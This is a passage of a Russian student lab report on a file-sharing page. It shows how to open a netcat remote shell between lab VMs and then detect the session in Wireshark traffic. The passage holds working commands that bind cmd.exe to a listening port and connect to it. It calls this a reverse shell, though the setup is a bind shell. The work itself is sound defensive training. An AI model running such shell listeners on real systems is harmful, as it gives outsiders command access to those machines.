Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Лабораторные работы / Отчёт по лабораторной работе №5.docx
Скачиваний:
0
Добавлен:
30.09.2026
Размер:
10 Мб
Скачать
☆
    1. Осуществление Revers Shell, выполнение команды и поиск активности Revers Shell в пакетах трафика

На ВМ с ОС Windows 10 запустим командную строку и введём команду ncat -nlvp 4444 -e cmd.exe, где n – опция для отключения DNS, l – опция для начала прослушивания, v – опция для режима вывода информации о процессе работы программы, p – опция для указания номера порта прослушивания.

Рисунок 34 – Настройка NetCat на прослушивание на ВМ с ОС Windows 10

Подключимся к этому порту с ВМ с Kali Linux с помощью команды nc -nv 192.168.1.10 4444

Рисунок 35 – Подключение к ВМ с ОС Windows 10 с помощью NetCat

После установления соединения на ВМ с ОС Windows 10 запустится командная оболочка cmd.exe

Рисунок 36 – Запуск командной оболочки cmd.exe

Выполним команду hostname на ВМ с ОС Kali linux

Рисунок 37 – Выполнение команды hostname на ВМ с ОС Kali linux

На ВМ с ОС Windows 10 запустим программу WireShark, находим один пакет, нажимаем ПКМ по нему, переходим по пути «Отслеживать → TCP поток» и фиксируем выполненную команду hostname

Рисунок 38 – Фиксация Revers Shell в трафике

  1. Вывод

В результате выполнения данной лабораторной работы были получены практические навыки мониторинга и анализа сетевого трафика для обнаружения потенциальных угроз безопасности и вторжений.

13